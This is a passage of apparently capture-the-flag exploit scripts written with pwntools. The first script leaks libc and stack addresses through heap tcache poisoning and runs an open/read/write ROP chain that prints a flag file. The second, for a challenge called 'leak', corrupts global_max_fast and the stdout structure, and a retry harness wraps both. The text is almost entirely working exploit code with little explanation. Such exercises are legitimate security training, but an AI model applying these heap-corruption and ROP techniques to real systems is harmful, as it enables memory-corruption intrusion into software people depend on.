libc_base = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x3ebca0
log.success("libc_base:\\t" + hex(libc_base))
pop_rdi_addr = libc_base + 0x2164f
pop_rsi_addr = libc_base + 0x23a6a
pop_rdx_addr = libc_base + 0x1b96
pop_rax_addr = libc_base + 0x1b500
syscall_addr = libc_base + 0xd2625
free_hook_addr = libc_base + 0x3ed8e8
environ = libc_base + 0x3ee098
gets_addr = libc_base + 0x80060
add(9, 0x88)
delete(0)
delete(9)
edit(1, p64(environ))
add(9, 0x88)
add(0, 0x88)
show(0)
stack = u64(sh.recvuntil('\\n', drop=True)[-6:].ljust(8, '\\x00')) - 0x120
log.success("stack:\\t" + hex(stack))
delete(2)
delete(9)
edit(1, p64(stack - 0x18))
add(9, 0x88)
add(2, 0x88)
start_addr = stack - 0x18
rop_chain1 = flat([
pop_rdi_addr,
0,
pop_rsi_addr,
stack,
pop_rdx_addr,
0x200,
syscall_addr,
])
rop_chain2 = flat([
pop_rdi_addr,
start_addr,
pop_rsi_addr,
0,
pop_rax_addr, # sys_open('flag', 0)
2,
syscall_addr,
pop_rax_addr, # sys_read(flag_fd, heap, 0x100)
0,
pop_rdi_addr,
3,
pop_rsi_addr,
start_addr + 0x200,
pop_rdx_addr,
0x100,
syscall_addr,
pop_rax_addr, # sys_write(1, heap, 0x100)
1,
pop_rdi_addr,
1,
pop_rsi_addr,
start_addr + 0x200,
syscall_addr
])
#gdb.attach(sh, "b *$rebase(0x0000000000000EA7)")
content = 'flag'.ljust(0x18, '\\x00') + rop_chain1
sh.sendline(str(2))
sh.sendlineafter("Index: ", str(2))
send_content = ""
for i in content:
send_content += bin(u8(i))[2:].rjust(8, '0')[::-1]
sh.sendafter("Content: ", send_content)
sh.sendline(p64(pop_rdi_addr + 1) * 0x10 + rop_chain2)
sh.interactive()leak
解题思路见 VNCTF 2022 HideOnHeap 这题
# encoding: utf-8
from pwn import *
elf = None
libc = None
file_name = "./leak"
context.timeout = 1
def get_file(dic=""):
context.binary = dic + file_name
return context.binary
def get_libc(dic=""):
if context.binary == None:
context.binary = dic + file_name
assert isinstance(context.binary, ELF)
libc = None
for lib in context.binary.libs:
if '/libc.' in lib or '/libc-' in lib:
libc = ELF(lib, checksec=False)
return libc
def get_sh(Use_other_libc=False, Use_ssh=False):
global libc
if args['REMOTE']:
if Use_other_libc:
libc = ELF("./libc.so.6", checksec=False)
if Use_ssh:
s = ssh(sys.argv[3], sys.argv[1], int(sys.argv[2]), sys.argv[4])
return s.process([file_name])
else:
if ":" in sys.argv[1]:
r = sys.argv[1].split(':')
return remote(r[0], int(r[1]))
return remote(sys.argv[1], int(sys.argv[2]))
else:
return process([file_name])
def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
int_mode=False):
if start_string != None:
sh.recvuntil(start_string)
if libc == True:
if info == None:
info = 'libc_base:\\t'
return_address = u64(sh.recvuntil('\\x7f')[-6:].ljust(8, '\\x00'))
elif int_mode:
return_address = int(sh.recvuntil(end_string, drop=True), 16)
elif address_len != None:
return_address = u64(sh.recv()[:address_len].ljust(8, '\\x00'))
elif context.arch == 'amd64':
return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\\x00'))
else:
return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\\x00'))
if offset != None:
return_address = return_address + offset
if info != None:
log.success(info + str(hex(return_address)))
return return_address
def get_flag(sh):
try:
sh.recvrepeat(0.1)
sh.sendline('cat flag')
return sh.recvrepeat(0.3)
except EOFError:
return ""
def get_gdb(sh, addr=None, gdbscript=None, stop=False):
if args['REMOTE']:
return
if gdbscript is not None:
gdb.attach(sh, gdbscript)
elif addr is not None:
gdb.attach(sh, 'b *$rebase(' + hex(addr) + ")")
else:
gdb.attach(sh)
if stop:
pause()
def Attack(target=None, elf=None, libc=None):
global sh
if sh is None:
from Class.Target import Target
assert target is not None
assert isinstance(target, Target)
sh = target.sh
elf = target.elf
libc = target.libc
assert isinstance(elf, ELF)
assert isinstance(libc, ELF)
try_count = 0
while try_count < 30:
try_count += 1
try:
pwn(sh, elf, libc)
break
except KeyboardInterrupt:
break
except EOFError:
sh.close()
if target is not None:
sh = target.get_sh()
target.sh = sh
if target.connect_fail:
return 'ERROR : Can not connect to target server!'
else:
sh = get_sh()
flag = get_flag(sh)
return flag
def choice(idx):
sh.sendlineafter("choice: ", str(idx))
def add(idx, size):
choice(1)
sh.sendlineafter("Index: ", str(idx))
sh.sendlineafter("Size: ", str(size))
def edit(idx, content):
choice(2)
sh.sendlineafter("Index: ", str(idx))
sh.sendafter("Content: ", str(content))
def delete(idx):
choice(3)
sh.sendlineafter("Index: ", str(idx))
def pwn(sh, elf, libc):
context.log_level = "debug"
delta = 0xb30
size = (delta * 2) + 0x20
alloc_size = size - 0x10
add(0, alloc_size)
add(1, alloc_size + 0x10)
add(2, alloc_size + 0x20)
add(3, 0x80)
add(4, 0x80)
add(5, 0x80)
for i in range(8):
edit(4, p64(0) * 2)
delete(4)
delete(3)
edit(4, '\\x40\\xf9')
add(6, 0x80)
add(7, 0x80) # global_max_fast
add(8, 0x110) # clear unsortedbin
for i in range(3):
edit(4, p64(0) * 2)
delete(4)
edit(4, '\\x60\\xe7')
add(9, 0x80)
add(10, 0x80) # stdout
edit(7, '\\xff' * 8)
delete(0)
delete(1)
delete(2)
edit(10, p64(0xfbad1800) + '\\x00' * 0x19)
choice(6)
# gdb.attach(sh, "b free")
# delete(0)
sh.interactive()
if __name__ == "__main__":
sh = get_sh()
flag = Attack(elf=get_file(), libc=get_libc())
sh.close()
if flag != "":
log.success('The flag is ' + re.search(r'flag{.+}', flag).group())